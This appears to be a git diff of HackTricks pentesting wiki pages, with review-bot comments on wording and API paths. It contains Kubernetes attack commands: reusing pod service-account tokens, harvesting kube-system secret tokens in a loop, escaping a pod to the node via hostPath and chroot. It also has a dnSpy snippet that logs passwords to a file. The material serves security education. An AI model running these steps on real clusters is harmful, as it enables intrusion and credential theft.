@ -80,7 +79,7 @@ With those details you can **enumerate kubernetes**. If the **API** for some rea
However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
## Differences between `list` and `get` verbs ### Differences between `list` and `get` verbs
With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API: With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API:
@ -113,7 +112,7 @@ They open a streaming connection that returns you the full manifest of a Deploym
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get` The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %} {% endhint %}
## Using curl ### Using curl
From inside a pod you can use several env variables: From inside a pod you can use several env variables:
@ -126,7 +125,7 @@ export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\"" alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
``` ```
## Using kubectl ### Using kubectl
Having the token and the address of the API server you use kubectl or curl to access it as indicated here: Having the token and the address of the API server you use kubectl or curl to access it as indicated here:
@ -138,7 +137,7 @@ You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/doc
To find the HTTP request that `kubectl` sends you can use the parameter `-v=8` To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
## Current Configuration ### Current Configuration
{% tabs %} {% tabs %}
{% tab title="Kubectl" %} {% tab title="Kubectl" %}
@ -167,7 +166,7 @@ kubectl config set-credentials USER_NAME \
--auth-provider-arg=id-token=( your id_token ) --auth-provider-arg=id-token=( your id_token )
``` ```
## Get Supported Resources ### Get Supported Resources
With this info you will know all the services you can list With this info you will know all the services you can list
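Review bot: `--auth-provider-arg=id-token=( your id_token )` is not valid shell: an unquoted `(` inside a word is a syntax error in bash, so the snippet cannot be pasted as written. Use an angle-bracket placeholder such as `--auth-provider-arg=id-token=<id_token>`. In the same hunk, "all the services you can list" under "Get Supported Resources" should be "all the resource types you can list", since `api-resources` enumerates API resources, not Kubernetes Services.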
@ -180,7 +179,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Current Privileges ### Get Current Privileges
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -205,8 +204,8 @@ kurl -i -s -k -X $'POST' \
You can learn more about **Kubernetes RBAC** in You can learn more about **Kubernetes RBAC** in
{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %} {% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) [kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
{% endcontent-ref %} {% endcontent-ref %}
**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges: **Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
@ -215,7 +214,7 @@ You can learn more about **Kubernetes RBAC** in
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %} {% endcontent-ref %}
## Get Others roles ### Get Others roles
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -233,7 +232,7 @@ kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clu
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get namespaces ### Get namespaces
Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
@ -251,7 +250,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get secrets ### Get secrets
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -276,7 +275,7 @@ If you can read secrets you can use the following lines to get the privileges re
for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done
``` ```
## Get Service Accounts ### Get Service Accounts
As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges. As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
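Review bot: the token-harvesting loop relies on `cut -d " " -f 7`, which only works if `kubectl describe` pads `token:` with exactly six spaces; `awk '/token:/{print $2}'` is robust to the column width, and `$token` should be quoted. "As discussed at the begging of this page" should be "beginning". A caveat is also worth adding: from Kubernetes 1.24 a long-lived token Secret is no longer auto-created for every service account, so this loop finds fewer tokens on newer clusters.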
@ -294,7 +293,7 @@ curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Deployments ### Get Deployments
The deployments specify the **components** that need to be **run**. The deployments specify the **components** that need to be **run**.
@ -313,7 +312,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Pods ### Get Pods
The Pods are the actual **containers** that will **run**. The Pods are the actual **containers** that will **run**.
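Review bot: "The Pods are the actual **containers** that will **run**" conflates the two objects; a Pod is the scheduling unit that wraps one or more containers sharing a network namespace. Suggest "Pods wrap the actual containers that will run".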
@ -332,7 +331,7 @@ curl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get Services ### Get Services
Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
@ -351,7 +350,7 @@ curl -v https://$APISERVER/api/v1/namespaces/default/services/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get nodes ### Get nodes
Get all the **nodes configured inside the cluster**. Get all the **nodes configured inside the cluster**.
@ -369,7 +368,7 @@ curl -v https://$APISERVER/api/v1/nodes/
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get DaemonSets ### Get DaemonSets
**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed. **DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
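Review bot: typo in the DaemonSet description: "**DaeamonSets** allows to ensure" should be "**DaemonSets** allow you to ensure".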
@ -387,7 +386,7 @@ curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get cronjob ### Get cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action. Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
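Review bot: the curl path shown in this hunk's header, `apis/extensions/v1beta1/namespaces/default/daemonsets`, targets an API group that no longer serves DaemonSets (removed in Kubernetes 1.16); the request should go to `apis/apps/v1/namespaces/default/daemonsets` so the curl tab matches what `kubectl get daemonsets` uses. The CronJob sentence also needs rewording: "Cron jobs allows to schedule using crontab like syntax the launch of a pod" reads better as "CronJobs allow you to schedule, with crontab-like syntax, a Job that launches a pod".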
@ -405,7 +404,7 @@ curl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Get "all" ### Get "all"
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
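Review bot: the path in this hunk's header, `apis/batch/v1beta1/namespaces/<namespace>/cronjobs`, uses the CronJob beta API that was deprecated in Kubernetes 1.21 in favour of `apis/batch/v1/...` and is scheduled for removal in 1.25; use the `batch/v1` path and mention `v1beta1` only as a fallback for older clusters.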
@ -415,7 +414,7 @@ k get all
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## **Get Pods consumptions** ### **Get Pods consumptions**
{% tabs %} {% tabs %}
{% tab title="kubectl" %} {% tab title="kubectl" %}
@ -425,7 +424,7 @@ k top pod --all-namespaces
{% endtab %} {% endtab %}
{% endtabs %} {% endtabs %}
## Escaping from the pod ### Escaping from the pod
If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
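Review bot: "they display existing images and pathes" should be "paths". The paragraph also skips the step that makes the escape work: the manifest has to mount the node's root filesystem with a `hostPath` volume before `chroot` into it is possible, which the reference in the next hunk ("Insecure Host Path Volume") confirms; say so here rather than leaving the reader to infer it from the YAML.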
@ -480,11 +479,10 @@ chroot /root /bin/bash
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
# References ## References
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %} {% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -500,5 +498,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -1,4 +1,4 @@
# Kubernetes Namespace Escalation
<details> <details>
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
Here are some techniques you can try to escape to a different namespace: Here are some techniques you can try to escape to a different namespace:
## Abuse K8s privileges ### Abuse K8s privileges
Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
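Review bot: grammar in this paragraph: "if the account you have stolen have sensitive privileges over the namespace you can to escalate to" should be "has sensitive privileges over the namespace you want to escalate to", and "read the **secret** SA tokens" reads better as "read the SA token **secrets**".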
@ -31,7 +30,7 @@ For more info about which privileges you can abuse read:
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) [abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %} {% endcontent-ref %}
## Escape to the node ### Escape to the node
If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
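Review bot: typos in this hunk: "because you ca create a privileged pod" should be "can create", and "steal other SAs tokens" should be "steal other SA tokens".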
@ -41,12 +40,10 @@ If you can escape to the node either because you have compromised a pod and you
All these techniques are explained in: All these techniques are explained in:
{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} {% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) [attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %} {% endcontent-ref %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -62,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

@ -36,7 +36,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
### 0- Physical Attacks ### 0- Physical Attacks
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/). Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications/).
### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) ### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
@ -146,9 +146,9 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
#### **Exploiting** #### **Exploiting**
* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/) * [**Basic Linux Exploiting**](../group-1/linux-exploiting-basic-esp/)
* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md) * [**Basic Windows Exploiting**](../group-1/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Basic exploiting tools**](../exploiting/tools/) * [**Basic exploiting tools**](../group-1/tools/)
#### [**Basic Python**](../misc/basic-python/) #### [**Basic Python**](../misc/basic-python/)
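Review bot: the three exploiting links now point into `../group-1/`, which looks like an auto-generated GitBook group slug; it tells a reader following the path nothing and is likely to change the next time the group is reorganised. Since the new README in this commit is titled "Reversing & Exploiting", naming the group accordingly (for example `reversing-and-exploiting/`) would keep these links readable.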

@ -0,0 +1,2 @@
# Reversing & Exploiting
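Review bot: the new "Reversing & Exploiting" README contains only its title. A section landing page this empty gives the reader nothing to navigate by; add at least a one-line description and links to the pages moved under it (the Linux and Windows exploiting guides and the tools page that the methodology hunk in this commit now links into `group-1/`).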

@ -1,5 +1,7 @@
# Reversing Tools & Basic Methods # Reversing Tools & Basic Methods
## Reversing Tools & Basic Methods
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
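Review bot: the added `## Reversing Tools & Basic Methods` repeats the H1 immediately above it verbatim. The rest of this file's headings were simply demoted one level (`#` to `##`), so this extra H2 is unnecessary; drop it rather than render the title twice.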
@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Wasm decompiler / Wat compiler
# Wasm decompiler / Wat compiler
Online: Online:
@ -30,14 +31,14 @@ Software:
* [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo) * [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo)
* [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec) * [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec)
# .Net decompiler ## .Net decompiler
[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\ [https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\
[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\ [ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\
If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\ If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\
You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/) You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/)
## DNSpy Logging ### DNSpy Logging
In order to make **DNSpy log some information in a file**, you could use this .Net lines: In order to make **DNSpy log some information in a file**, you could use this .Net lines:
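Review bot: typos and inconsistent casing in this hunk: "You cloud also try" should be "could", "this .Net lines" should be "these .NET lines", and the tool is written as `dnSpy` in the link text but `DNSpy` in the headings; pick one spelling, the project's own `dnSpy`.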
@ -47,7 +48,7 @@ path = "C:\\inetpub\\temp\\MyTest2.txt";
File.AppendAllText(path, "Password: " + password + "\n"); File.AppendAllText(path, "Password: " + password + "\n");
``` ```
## DNSpy Debugging ### DNSpy Debugging
In order to debug code using DNSpy you need to: In order to debug code using DNSpy you need to:
@ -108,14 +109,14 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**:
![](<../../.gitbook/assets/image (285).png>) ![](<../../.gitbook/assets/image (285).png>)
# Java decompiler ## Java decompiler
[https://github.com/skylot/jadx](https://github.com/skylot/jadx)\ [https://github.com/skylot/jadx](https://github.com/skylot/jadx)\
[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases) [https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
# Debugging DLLs ## Debugging DLLs
## Using IDA ### Using IDA
* **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe) * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
* Select **Windbg** debugger * Select **Windbg** debugger
@ -131,7 +132,7 @@ Then, when you start debugging **the execution will be stopped when each DLL is
But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how. But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how.
## Using x64dbg/x32dbg ### Using x64dbg/x32dbg
* **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe) * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe)
* **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain * **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
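Review bot: "how can you get to the code of the DLL that was lodaded?" should be "loaded".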
@ -144,7 +145,7 @@ Notice that when the execution is stopped by any reason in win64dbg you can see
Then, looking to this ca see when the execution was stopped in the dll you want to debug. Then, looking to this ca see when the execution was stopped in the dll you want to debug.
# GUI Apps / Videogames ## GUI Apps / Videogames
[**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: [**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in:
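Review bot: "Then, looking to this ca see when the execution was stopped" should read "Then, looking at this you can see when the execution stopped".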
@ -152,13 +153,13 @@ Then, looking to this ca see when the execution was stopped in the dll you want
[cheat-engine.md](cheat-engine.md) [cheat-engine.md](cheat-engine.md)
{% endcontent-ref %} {% endcontent-ref %}
# ARM & MIPS ## ARM & MIPS
{% embed url="https://github.com/nongiach/arm_now" %} {% embed url="https://github.com/nongiach/arm_now" %}
# Shellcodes ## Shellcodes
## Debugging a shellcode with blobrunner ### Debugging a shellcode with blobrunner
[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\ [**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\
Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode. Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode.
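Review bot: two typos in the Blobrunner paragraph: "the memory address were the shellcode was allocated" should be "where", and "put a breakpoint the indicated memory address" is missing "at".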
@ -170,7 +171,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
[blobrunner.md](blobrunner.md) [blobrunner.md](blobrunner.md)
{% endcontent-ref %} {% endcontent-ref %}
## Debugging a shellcode with jmp2it ### Debugging a shellcode with jmp2it
[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. [**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode.
@ -178,7 +179,7 @@ You can find a slightly modified version of Blobrunner in the following link. In
You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/). You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/).
## Debugging shellcode using Cutter ### Debugging shellcode using Cutter
[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. [**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically.
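Review bot: "Cutter is the GUI of radare" is inconsistent with the link, which points to `rizinorg/cutter`; since the fork, Cutter is the GUI for rizin, and the sentence should say so.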
@ -196,7 +197,7 @@ You can see the stack for example inside a hex dump:
![](<../../.gitbook/assets/image (402).png>) ![](<../../.gitbook/assets/image (402).png>)
## Deobfuscating shellcode and getting executed functions ### Deobfuscating shellcode and getting executed functions
You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\ You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
@ -216,11 +217,11 @@ scDbg also counts with a graphical launcher where you can select the options you
The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg). The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg).
## Disassembling using CyberChef ### Disassembling using CyberChef
Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\)) Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\))
# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator) ## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator)
This obfuscator **modify all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works: This obfuscator **modify all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works:
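Review bot: "Upload you shellcode file as input and use the following receipt to decompile it" should read "your", "recipe", and "disassemble" (the linked CyberChef operation is `Disassemble_x86`, and the heading says disassembling). The Movfuscator description in the same hunk is garbled too: "This obfuscator **modify all the instructions for `mov`**" should say "replaces every instruction with `mov`", and "interruptions to change executions flows" should be "interrupts to change execution flow".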
@ -238,7 +239,7 @@ And [install keystone](https://github.com/keystone-engine/keystone/blob/master/d
If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html)
# Rust ## Rust
To find the **entry point** search the functions by `::main` like in: To find the **entry point** search the functions by `::main` like in:
@ -247,7 +248,7 @@ To find the **entry point** search the functions by `::main` like in:
In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\ In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\
Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**. Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**.
# **Delphi** ## **Delphi**
For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR)
@ -259,7 +260,7 @@ This plugin will execute the binary and resolve function names dynamically at th
It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom. It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom.
# Golang ## Golang
I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper) I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
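Review bot: "the debugger will stop in the function executed by that bottom" should be "button", and "I you have to reverse a Golang binary" should be "If you".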
@ -267,15 +268,15 @@ Just press **ATL+f7** (import python plugin in IDA) and select the python plugin
This will resolve the names of the functions. This will resolve the names of the functions.
# Compiled Python ## Compiled Python
In this page you can find how to get the python code from an ELF/EXE python compiled binary: In this page you can find how to get the python code from an ELF/EXE python compiled binary:
{% content-ref url="../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) [.pyc.md](../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %} {% endcontent-ref %}
# GBA - Game Body Advance ## GBA - Game Body Advance
If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it: If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it:
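Review bot: the shortcut in this hunk's header, "ATL+f7", should be "Alt+F7" (IDA's Script file shortcut), and the heading "GBA - Game Body Advance" should be "Game Boy Advance".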
@ -388,11 +389,11 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
**Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/) **Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
# Game Boy ## Game Boy
